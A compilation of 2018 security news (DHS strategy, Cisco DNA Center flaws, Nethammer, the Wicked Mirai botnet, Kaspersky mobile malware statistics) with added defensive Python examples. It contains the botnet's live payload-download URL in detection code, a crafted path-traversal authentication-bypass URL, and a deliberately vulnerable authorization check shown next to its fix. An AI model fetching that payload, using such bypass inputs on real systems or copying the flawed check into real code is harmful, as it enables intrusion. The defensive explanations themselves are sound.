It is reassuring that the organization is not seeking to develop its own new framework, but to encourage the use of existing relevant frameworks. "DHS," says the document, "must expand efforts to encourage adoption of applicable cybersecurity best practices, including NIST's Framework for Improving Critical Infrastructure Cybersecurity."

It is a little surprising, however, that while NIST is specified, the Domain-based Message Authentication, Reporting and Conformance (DMARC) protocol is not mentioned. In October 2017, DHS issued a binding operational directive requiring all federal agencies to start using DMARC. By January 2018 it was reported that about half of the agencies had implemented DMARC, but only at its lowest level.
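The "lowest level" referred to above is a record whose policy is p=none: aggregate reports are collected, but mail that fails DMARC is neither quarantined nor rejected. Here is an added example in Python, not from DHS or the directive, that parses a DMARC TXT record and classifies how much it actually enforces, with the gaps an auditor would raise. The sample records and the example.gov addresses are constructed for the example.

```python
VALID_POLICIES = {"none", "quarantine", "reject"}


def parse_dmarc(record):
    """Split a DMARC TXT record into (tags, tag order) per RFC 7489 "tag=value;".

    Raises ValueError for a syntactically broken record.
    """
    tags = {}
    order = []
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError("malformed tag: %r" % part)
        key, value = part.split("=", 1)
        key = key.strip().lower()
        tags[key] = value.strip()
        order.append(key)
    return tags, order


def enforcement_level(record):
    """Classify a record: 'invalid', 'monitoring-only' (p=none, the lowest
    level the article mentions), 'partial' (pct below 100) or 'enforced'."""
    try:
        tags, order = parse_dmarc(record)
    except ValueError:
        return "invalid"
    # RFC 7489: "v" must be the first tag and must read DMARC1; "p" is required.
    if not order or order[0] != "v" or tags["v"] != "DMARC1":
        return "invalid"
    policy = tags.get("p")
    if policy not in VALID_POLICIES:
        return "invalid"
    if policy == "none":
        return "monitoring-only"
    pct = tags.get("pct", "100")
    if not pct.isdigit() or not 0 <= int(pct) <= 100:
        return "invalid"
    if int(pct) < 100:
        return "partial"
    return "enforced"


def report_findings(record):
    """Return the human-readable gaps an auditor would raise for a record."""
    level = enforcement_level(record)
    if level == "invalid":
        return ["record is not a valid DMARC record"]
    tags, _ = parse_dmarc(record)
    findings = []
    if level == "monitoring-only":
        findings.append("p=none: mail failing DMARC is still delivered")
    if level == "partial":
        findings.append("pct=%s: only a sample of failing mail is acted on" % tags["pct"])
    if "rua" not in tags:
        findings.append("no rua= address: aggregate reports are not collected")
    subdomain_policy = tags.get("sp", tags["p"])  # sp defaults to p
    if subdomain_policy == "none" and tags["p"] != "none":
        findings.append("sp=none: subdomains are left unprotected")
    return findings


# Constructed sample records (not real agency records).
SAMPLE_RECORDS = [
    "v=DMARC1; p=none; rua=mailto:dmarc@example.gov",
    "v=DMARC1; p=reject; pct=25; rua=mailto:dmarc@example.gov",
    "v=DMARC1; p=reject; sp=none; rua=mailto:dmarc@example.gov",
    "p=reject; v=DMARC1",
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(enforcement_level(rec), "|", rec, "|", report_findings(rec))
```

To audit a domain, resolve the TXT record at _dmarc.<domain> (for example with dig, which is outside this block) and feed the string to report_findings. A record that classifies as monitoring-only is the state the January 2018 figures describe: DMARC is "implemented", but spoofed mail from the domain is still delivered.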

It is easy to be critical of a high-level strategy document -- it is the detail of implementation that will decide on the effectiveness of this strategy. For the moment, this document marks a valuable and important approach to unifying and strengthening the domestic cybersecurity remit of the DHS. "The DHS approach to managing cybersecurity risk on the national level," comments Brajesh Goyal, VP of engineering at Cavirin, "is a good analogy for what organizations need to do to manage their cyber-posture. A good framework for this is the NIST Cybersecurity Framework (CSF). This can serve as a foundation for other security in-depth actions."

"It's important that the DHS has finally published its cybersecurity strategy," explains DeMeo; "but by definition, this is high-level. For the most part, these are sensible recommendations. What's critical now is making this strategy actionable. One of the document's guiding principles is to foster innovation and agility -- this is a big ask, where existing time horizons must be reduced from years down to months. We need to dramatically accelerate collaboration with the private sector, where meaningful security innovation is happening daily, if we are going to change the asymmetric nature of today's threat landscape."


CISCO issued security updates to address three critical flaws in Cisco DNA Center
18.5.2018 securityaffairs Vulnerebility

Cisco has issued security updates to address three critical vulnerabilities in its Digital Network Architecture (DNA) Center appliance; admins need to update their installs as soon as possible.

The DNA Center is a network management and administration tool. Cisco discovered three vulnerabilities that could be exploited by remote, unauthenticated attackers to take over the appliance.

The most severe issue is a static credentials vulnerability (CVE-2018-0222) affecting the DNA Center; an attacker who knows the credentials can completely take over the targeted appliance.

“A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to log in to an affected system by using an administrative account that has default, static user credentials.” reads the security advisory published by Cisco.

The experts found undocumented, static user credentials for the default administrative account in the affected software.

“The vulnerability is due to the presence of undocumented, static user credentials for the default administrative account for the affected software. An attacker could exploit this vulnerability by using the account to log in to an affected system.” continues the advisory.

“A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands with root privileges.”

The second vulnerability tracked as CVE-2018-0271 affects the API gateway of the Cisco Digital Network Architecture (DNA) Center.

The flaw could be exploited by a remote, unauthenticated attacker to bypass authentication and gain privileged access to critical services in the DNA Center.

“A vulnerability in the API gateway of the Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to bypass authentication and access critical services.” reads the Cisco advisory.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue.” continues the advisory.
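Both Cisco write-ups give the same root cause for CVE-2018-0271: the API gateway made its access decision on a URL it had not normalized. The following is an added example in Python, not Cisco's code and not derived from the real DNA Center gateway, that shows the pattern on a toy gateway which exempts one public prefix from authentication. The route prefix /api/v1/public/ is hypothetical. The vulnerable check matches the prefix on the raw path, so a request whose path walks back out of the public prefix is still treated as public; the fixed check decodes and canonicalizes the path first and decides on the same path the backend will actually serve.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Hypothetical route table: one prefix is reachable without a session,
# everything else requires authentication. Paths are illustrative only.
PUBLIC_PREFIXES = ("/api/v1/public/",)


def is_public(path):
    """True if the path is the public root or lies under a public prefix."""
    return any(path == p.rstrip("/") or path.startswith(p) for p in PUBLIC_PREFIXES)


def is_authorized_vulnerable(url, authenticated):
    """Access decision on the raw path: the prefix is matched before any
    normalization, which is the flaw class the Cisco advisory describes."""
    path = urlsplit(url).path
    if is_public(path):
        return True          # treated as public, no session needed
    return authenticated


def normalize_path(path):
    """Canonicalize a request path before any security decision:
    percent-decode until stable (catches %2e%2e and %252e%252e), resolve
    '.' and '..' segments, collapse repeated slashes, force one leading '/'.
    """
    previous = None
    while previous != path:
        previous, path = path, unquote(path)
    path = posixpath.normpath(path)
    if not path.startswith("/"):
        path = "/" + path
    while path.startswith("//"):   # normpath keeps a POSIX double leading slash
        path = path[1:]
    return path


def is_authorized_fixed(url, authenticated):
    """Same decision, but on the canonical path the backend will serve."""
    path = normalize_path(urlsplit(url).path)
    if is_public(path):
        return True
    return authenticated


if __name__ == "__main__":
    crafted = "/api/v1/public/../admin/users"
    print("vulnerable:", is_authorized_vulnerable(crafted, authenticated=False))
    print("fixed:     ", is_authorized_fixed(crafted, authenticated=False))
    print("canonical: ", normalize_path("/api/v1/public/%252e%252e/admin"))
```

The underlying bug is a parser differential: the gateway and the service behind it interpret the same bytes as different paths. The durable fix is to canonicalize once, at the edge, and route and authorize on that canonical form, so no downstream component ever sees a path the gateway has not already judged.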

The third critical flaw in DNA Center fixed by Cisco tracked as CVE-2018-0268 could be exploited by an attacker to bypass authentication within the container instances and obtain elevated privileges.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” states the Cisco security advisory. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

Cisco rolled out the fix to DNA Center via its System Updates tool; admins need to install version 1.1.3 as soon as possible.


Nethammer – Exploiting Rowhammer attack through network without a single attacker-controlled line of code
18.5.2018 securityaffairs Exploit

Nethammer attack technique is the first truly remote Rowhammer attack that doesn’t require a single attacker-controlled line of code on the targeted system.
A few days ago security experts announced the first network-based remote Rowhammer attack, dubbed Throwhammer. The attack exploits a known vulnerability in DRAM through network cards using remote direct memory access (RDMA) channels.

Rowhammer is a problem affecting some recent DRAM devices in which repeatedly accessing (hammering) a row of memory can cause bit flips in adjacent rows; in principle this lets an attacker change the value of bits in memory they have no permission to write.

The issue has been known at least since 2012; the first practical attack was demonstrated in 2015 by researchers at Google's Project Zero team.

To better understand the Rowhammer flaw, remember that DDR memory is arranged in an array of rows and columns. Blocks of memory are assigned to various services and applications, and to prevent one application from accessing the memory space reserved for another, the system enforces an isolation ("sandbox") mechanism.

The bit flips caused by Rowhammer can be exploited to break out of that isolation, because they modify memory the attacker cannot legitimately write.

A separate group of security researchers has now demonstrated another network-based remote Rowhammer attack, dubbed Nethammer, that leverages uncached memory or flush instructions used while processing network requests.

“Nethammer is the first truly remote Rowhammer attack, without a single attacker-controlled line of code on the targeted system. Systems that use uncached memory or flush instructions while handling network requests, e.g., for interaction with the network device, can be attacked using Nethammer” reads the research paper published by the experts.

The research team was composed of academics from the Graz University of Technology, the University of Michigan and Univ Rennes.

Nethammer works by sending a stream of network packets that forces the target to repeatedly access the memory used for packet processing; depending on where the resulting bit flips land, they can compromise the integrity of the system and its data or cause a persistent denial of service.

The attack is feasible only with a fast network connection between the attacker and victim.

“We demonstrate that the frequency of the cache misses is in all three cases high enough to induce bit flips. We evaluated different bit flip scenarios.” continues the paper.
“Depending on the location, the bit flip compromises either the security and integrity of the system and the data of its users, or it can leave persistent damage on the system, i.e., persistent denial of service.”

This process results in a high number of memory accesses to the same set of memory locations, which can induce disturbance errors in DRAM and cause memory corruption by unintentionally flipping DRAM bit values. The resulting data corruption can be exploited by attackers to compromise the victim's system.

“To mount a Rowhammer attack, memory accesses need to be directly served by the main memory. Thus, an attacker needs to make sure that the data is not stored in the cache.” continues the paper.
“An attacker can use the unprivileged clflush instruction to invalidate the cache line or use uncached memory if available.”

The experts highlighted that caching makes the attack more difficult, so they devised techniques to bypass the cache and reach DRAM directly in order to cause the interference.

The experts successfully demonstrated three different cache bypasses for the Nethammer technique:

A kernel driver that flushes (and reloads) an address whenever a packet is received.
Intel Xeon CPUs with Intel CAT for fast cache eviction.
Uncached memory on an ARM-based mobile device.
The experts observed a bit flip every 350 ms, demonstrating that it is possible to hammer over the network as long as at least two memory accesses per received packet are served from main memory; they induced the flips by sending a stream of UDP packets at up to 500 Mbit/s to the target system.
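To see why the "fast network connection" condition matters, here is an added worked calculation in Python, not from the Nethammer paper, that turns the figures above (500 Mbit/s, at least two DRAM accesses per packet) into the number of DRAM accesses that land inside one refresh interval, and inverts the model to give the link rate needed for a chosen access count. The Ethernet framing overhead, the 64 ms DRAM refresh interval and the minimum IP/UDP header sizes are standard values assumed here, not figures from the page; the model ignores any packet-rate limit on the receiving host, so it is an upper bound on what the link alone can deliver.

```python
# Assumptions (standard values, not figures from the page): Ethernet
# framing overhead, minimum Ethernet payload, IPv4+UDP headers, and the
# 64 ms DRAM refresh interval within which hammering must take effect.
ETH_OVERHEAD_BYTES = 8 + 14 + 4 + 12   # preamble+SFD, header, FCS, inter-frame gap
MIN_ETH_PAYLOAD = 46
IP_UDP_HEADERS = 20 + 8
REFRESH_INTERVAL_S = 0.064


def frame_bits(udp_payload_bytes):
    """Bits on the wire for one UDP datagram, including padding up to the
    minimum Ethernet payload; small packets maximise the packet rate."""
    payload = max(MIN_ETH_PAYLOAD, IP_UDP_HEADERS + udp_payload_bytes)
    return 8 * (payload + ETH_OVERHEAD_BYTES)


def packets_per_second(link_bps, udp_payload_bytes):
    """Packet rate a link of link_bps can carry for this payload size."""
    return link_bps / frame_bits(udp_payload_bytes)


def dram_accesses_per_refresh(link_bps, udp_payload_bytes, accesses_per_packet=2):
    """DRAM-served accesses inside one refresh interval. The page's
    condition is at least two such accesses per received packet."""
    pps = packets_per_second(link_bps, udp_payload_bytes)
    return pps * accesses_per_packet * REFRESH_INTERVAL_S


def min_link_bps(target_accesses, udp_payload_bytes, accesses_per_packet=2):
    """Invert the model: link rate needed to reach target_accesses
    DRAM-served accesses per refresh interval."""
    pps_needed = target_accesses / REFRESH_INTERVAL_S / accesses_per_packet
    return pps_needed * frame_bits(udp_payload_bytes)


if __name__ == "__main__":
    link = 500e6                      # 500 Mbit/s, the rate used in the paper
    for payload in (18, 512, 1400):   # 18 bytes gives a minimum-size frame
        print("payload %4d B: %8.0f pkt/s, %6.0f DRAM accesses per 64 ms"
              % (payload, packets_per_second(link, payload),
                 dram_accesses_per_refresh(link, payload)))
    print("link needed for 95238 accesses/64 ms with 18-byte payload: %.0f bit/s"
          % min_link_bps(95238, 18))
```

With minimum-size frames, 500 Mbit/s is about 744,000 packets per second, or roughly 95,000 DRAM accesses per 64 ms refresh interval at two accesses per packet; with 1400-byte payloads the same link yields under a tenth of that. That is the quantitative reason a slow or large-packet stream does not hammer, and why the receiver's per-packet memory behaviour (the three cache-bypass cases above) is what determines feasibility.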

Unlike the original Rowhammer attack, Nethammer does not require any attacker-controlled code on the target.

Unfortunately, attacks based on Rowhammer cannot be fully mitigated with software patches; fixing the root cause requires redesigning the affected hardware components, and in the meantime threat actors could start exploiting the Rowhammer technique in the wild.

Further details on the Rowhammer attack are reported in my post titled “The Rowhammer: the Evolution of a Dangerous Attack”


The new Wicked Mirai botnet leverages at least three new exploits
18.5.2018 securityaffairs BotNet

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’; it includes new exploits and spreads a new bot.
The name Wicked Mirai comes from the strings in the code, the experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”


The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie, at the time it was used to power massive DDoS attacks in the wild. The Mirai’s source code was leaked online in October 2016, since then many other variants emerged in the wild, including Satori, Masuta, and Okiru.

According to Fortinet, the author of Wicked Mirai is the same person behind the other variants it is linked to.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module that is responsible for the propagation of the malware.

The original Mirai leveraged brute-force attempts to compromise other IoT devices, while Wicked Mirai uses known exploits.

The Wicked Mirai would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot will attempt to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit used depends on the specific port the bot was able to connect to. Below is the list of devices targeted by Wicked Mirai:

Port 8080: Netgear DGN1000 and DGN2200 v1 routers (also used by Reaper botnet)
Port 81: CCTV-DVR Remote Code Execution
Port 8443: Netgear R7000 and R6400 Command Injection (CVE-2016-6277)
Port 80: Invoker shell in compromised web servers
The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation contradicted this hypothesis: the bot actually connects to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”
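Both write-ups of Wicked describe the same observable behaviour: a raw SYN sweep of ports 8080, 8443, 80 and 81 from one source, then a fetch of the second-stage bot from the host named in Fortinet's analysis. The following is an added example in Python, not Fortinet's code and not the bot's, that turns this into detection logic: it correlates SYN probes per source across those four ports, maps the probed ports to the exploit Wicked would select on each, and picks the payload URL out of HTTP or proxy logs. The log line format and all sample lines are constructed for the example; the .mips extension stands in for the "{extension}" placeholder in Fortinet's URL, and the payload host is used only as a string to match, never contacted.

```python
import re
from collections import defaultdict

# Port -> exploit Fortinet says Wicked selects once the SYN is answered.
WICKED_PORT_EXPLOITS = {
    8080: "Netgear DGN1000 / DGN2200 v1 (also used by Reaper)",
    81: "CCTV-DVR remote code execution",
    8443: "Netgear R7000 / R6400 command injection (CVE-2016-6277)",
    80: "invoker shell on compromised web servers",
}
# Payload host from Fortinet's analysis (defanged on the page). Used here
# only as a string to match in logs; never connect to it.
PAYLOAD_HOST = "185.246.152.173"

# Constructed log format (an assumption): "<ts> src=<ip> dst=<ip> dport=<n> flags=<f>"
SYN_RE = re.compile(r"src=(?P<src>[\d.]+) dst=[\d.]+ dport=(?P<dport>\d+) flags=S\b")
URL_RE = re.compile(r"https?://" + re.escape(PAYLOAD_HOST) + r"/exploit/[\w.-]+")


def wicked_scanners(lines, min_ports=3):
    """Return {src: sorted ports} for sources that SYN-probed at least
    min_ports of the four ports Wicked sweeps."""
    seen = defaultdict(set)
    for line in lines:
        m = SYN_RE.search(line)
        if not m:
            continue
        dport = int(m.group("dport"))
        if dport in WICKED_PORT_EXPLOITS:
            seen[m.group("src")].add(dport)
    return {src: sorted(p) for src, p in seen.items() if len(p) >= min_ports}


def expected_exploits(ports):
    """Map probed ports to the exploit Wicked would try on each."""
    return [WICKED_PORT_EXPLOITS[p] for p in ports if p in WICKED_PORT_EXPLOITS]


def payload_downloads(lines):
    """Pick out fetches of the second-stage bot from HTTP/proxy logs."""
    return [m.group(0) for m in map(URL_RE.search, lines) if m]


# Constructed sample lines: one sweeping source, one ordinary web client,
# and one internal host fetching the second stage after compromise.
SAMPLE_LINES = [
    "2018-05-17T10:00:01Z src=203.0.113.5 dst=192.0.2.10 dport=8080 flags=S",
    "2018-05-17T10:00:01Z src=203.0.113.5 dst=192.0.2.10 dport=8443 flags=S",
    "2018-05-17T10:00:02Z src=203.0.113.5 dst=192.0.2.10 dport=80 flags=S",
    "2018-05-17T10:00:02Z src=203.0.113.5 dst=192.0.2.10 dport=81 flags=S",
    "2018-05-17T10:00:03Z src=198.51.100.8 dst=192.0.2.10 dport=80 flags=S",
    "2018-05-17T10:00:03Z src=198.51.100.8 dst=192.0.2.10 dport=443 flags=S",
    "2018-05-17T10:00:05Z src=192.0.2.10 GET http://185.246.152.173/exploit/owari.mips",
]

if __name__ == "__main__":
    for src, ports in wicked_scanners(SAMPLE_LINES).items():
        print(src, ports, expected_exploits(ports))
    print("second-stage fetches:", payload_downloads(SAMPLE_LINES))
```

The port correlation is the higher-value signal: the download URL changes whenever the author swaps the payload (the page itself records Owari being replaced by Omni on the same host), whereas the four-port sweep is baked into the scanner module. Ordinary clients hitting 80 and 443 do not trip the three-port threshold, and in production the correlation window would be bounded by time rather than by a whole log file.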

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.


Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found a conversation with Owari/Sora IoT Botnet author dated back to April.

The vxer, who goes by the online handle of “Wicked,” said at the time that he had abandoned the Sora botnet and was working on the Owari one.

The conversation suggests the author has since abandoned both the Sora and Owari bots and is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.


Google Offers Free DDoS Protection for U.S. Political Organizations
17.5.2018 securityweek Attack

Jigsaw, an incubator run by Google parent Alphabet, this week announced the availability of Project Shield – which offers free distributed denial of service (DDoS) protections – for the U.S. political community.

Opened in February 2016 to independent, under-resourced news sites, Project Shield helps protect free speech by fending off crippling DDoS assaults. The service, which leverages Google technology, was launched only weeks after Google Ideas became Jigsaw.

In March last year, Google and Jigsaw announced a partnership to offer Protect Your Election, tools that would help news organizations, human rights groups, and election monitoring sites fend off not only DDoS assaults, but also phishing and account takeover attempts.

This week, Jigsaw revealed that Project Shield is now available for free to “U.S. political organizations registered with the appropriate electoral authorities, including candidates, campaigns, section 527 organizations, and political action committees.”

“These organizations are critical parts of the democratic process, and they deserve the same defenses against cyber-attacks that we’ve offered to news organizations around the world,” George Conard, Product Manager, Jigsaw, says.

The free service is offered in response to an increase in the frequency and intensity of digital attacks against democratic institutions in the United States and globally. Threat actors flood computer systems and servers with traffic to silence political speech and prevent voters from accessing the information they need.

Not only is the number of DDoS attacks increasing overall, but so is the number of attacks the same target faces, recent reports have revealed. The cost of launching a DDoS attack has decreased as well: one can hire a DDoS-launching service for only $10 per hour.

DDoS attacks increasingly target political parties, campaigns, and organizations, Conard notes. The most recent example is a Tennessee county website displaying election results being disrupted earlier this month for an hour on the night of the Tennessee congressional primary elections.

“Any political organization, regardless of size or significance, is potentially at risk. It’s critical to provide support to those smaller, more vulnerable political groups that don’t have the financial or technical resources to do it themselves. Project Shield helps ensure that any eligible organization can be protected from a range of digital attacks — for free,” Conard says.

While Project Shield can protect websites against DDoS attacks, the Protect Your Election initiative can help political organizations defend against other attacks as well. The goal remains the same as when Project Shield was launched: to protect freedom of expression and access to information.

Project Shield leverages Google’s infrastructure to protect from DDoS attacks using “a reverse proxy multi-layer defense system.” Basically, requests from end users first come through the Shield, which filters malicious traffic and only allows legitimate requests to pass through.

Not only is the tool free, but it is also easy to set up and requires no maintenance to keep a website safe from DDoS attacks, Conard says.

“Protecting critical infrastructure and institutions from cyber-attacks is more important than ever. With the U.S. midterm elections approaching, it’s crucial to make sure that private information is protected and public information is accessible,” he points out.

Jigsaw is committed to working with U.S. political organizations of all sizes to ensure that every one of them, regardless of their resources, can stay safe online. In the coming months, the protections will be expanded to international political organizations as well.


Hackers Steal '$15.3 Million' From Mexico Financial System
17.5.2018 securityweek Incident

Hackers who targeted Mexico's interbank payment system made off with more than $15 million in the past several weeks, the Bank of Mexico said Wednesday.

The amount of funds involved in the irregular activity totaled "approximately 300 million pesos ($15.3 million)," central bank governor Alejandro Diaz de Leon told reporters.

He said commercial bank customers' accounts were never in danger.

An investigation is under way, the governor said, without indicating if the suspected hackers were domestic or international.

The interbank payments system allows banks to make real-time transfers to each other.

They connect via their own computer systems or an external provider -- the point where the attacks appear to have taken place, Lorenza Martinez, director general of the corporate payments and services system at the central bank, said on Monday.

Martinez revealed that at least five attacks had occurred but, at that time, said the amount taken was still being analyzed.

After the attacks were detected, banks switched to a slower but more secure method.


IT threat evolution Q1 2018. Statistics
17.5.2018 Kaspersky  Analysis

Q1 figures
According to KSN:

Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.
282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.
Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.
Ransomware attacks were registered on the computers of 179,934 unique users.
Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.
Kaspersky Lab products for mobile devices detected:
1,322,578 malicious installation packages
18,912 installation packages for mobile banking Trojans
8,787 installation packages for mobile ransomware Trojans
Mobile threats
Q1 events
In Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was distributed.

This malicious resource shows a fake window while displaying the legitimate site in the address bar

It wasn’t a drive-by-download case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it’s interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.

However, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.

Some backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user’s phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let’s hope that the app creators had the noble intention of protecting users from telephone spam and fraudulent calls, but simply chose the wrong means to do so.

Mobile threat statistics
In Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.

Number of detected malicious installation packages, Q2 2017 – Q1 2018

Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018

Among all the threats detected in Q1 2018, the lion’s share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.

Second place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.

Advertising apps, which ranked second in Q4 2017, dropped a place—their share decreased by 8%, accounting for 11% of all detected threats.

On a separate note, Q1 saw a rise in the share of mobile banking threats. This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.

TOP 20 mobile malware
Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware.

Verdict %*
1 DangerousObject.Multi.Generic 70.17
2 Trojan.AndroidOS.Boogr.gsh 12.92
3 Trojan.AndroidOS.Agent.rx 5.55
4 Trojan-Dropper.AndroidOS.Lezok.p 5.23
5 Trojan-Dropper.AndroidOS.Hqwar.ba 2.95
6 Trojan.AndroidOS.Triada.dl 2.94
7 Trojan-Dropper.AndroidOS.Hqwar.i 2.51
8 Trojan.AndroidOS.Piom.rfw 2.13
9 Trojan-Dropper.AndroidOS.Lezok.t 2.06
10 Trojan.AndroidOS.Piom.pnl 1.78
11 Trojan-Dropper.AndroidOS.Agent.ii 1.76
12 Trojan-SMS.AndroidOS.FakeInst.ei 1.64
13 Trojan-Dropper.AndroidOS.Hqwar.gen 1.50
14 Trojan-Ransom.AndroidOS.Zebt.a 1.48
15 Trojan.AndroidOS.Piom.qmx 1.47
16 Trojan.AndroidOS.Dvmap.a 1.40
17 Trojan-SMS.AndroidOS.Agent.xk 1.35
18 Trojan.AndroidOS.Triada.snt 1.24
19 Trojan-Dropper.AndroidOS.Lezok.b 1.22
20 Trojan-Dropper.AndroidOS.Tiny.d 1.22
* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked.

As before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected using cloud technologies. Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.

In second place was Trojan.AndroidOS.Boogr.gsh (12.92%). This verdict is given to files recognized as malicious by our system based on machine learning.

Third was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan’s task is to covertly visit web pages as instructed by its C&C.

Fourth and fifth places went to the Trojan matryoshkas Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.

Sixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the Trojan.AndroidOS.Triada family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in “clean” apps.

The Trojan ransomware Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. Like other such mobile ransomware, the malware is distributed under the guise of a porn app.

Another interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.

Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)

TOP 10 countries by share of users attacked by mobile malware:

Country* %**
1 China 34.43
2 Bangladesh 27.53
3 Nepal 27.37
4 Ivory Coast 27.16
5 Nigeria 25.36
6 Algeria 24.13
7 Tanzania 23.61
8 India 23.27
9 Indonesia 22.01
10 Kenya 21.45
* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

In Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). The biggest climber was Nepal (27.37%), rising from ninth place last year to third.

Russia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).

The safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).

Mobile banking Trojans
In the reporting period, we detected 18,912 installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 – Q1 2018

Verdict %*
1 Trojan-Banker.AndroidOS.Asacub.bj 12.36
2 Trojan-Banker.AndroidOS.Svpeng.q 9.17
3 Trojan-Banker.AndroidOS.Asacub.bk 7.82
4 Trojan-Banker.AndroidOS.Svpeng.aj 6.63
5 Trojan-Banker.AndroidOS.Asacub.e 5.93
6 Trojan-Banker.AndroidOS.Hqwar.t 5.38
7 Trojan-Banker.AndroidOS.Faketoken.z 5.15
8 Trojan-Banker.AndroidOS.Svpeng.ai 4.54
9 Trojan-Banker.AndroidOS.Agent.di 4.31
10 Trojan-Banker.AndroidOS.Asacub.ar 3.52
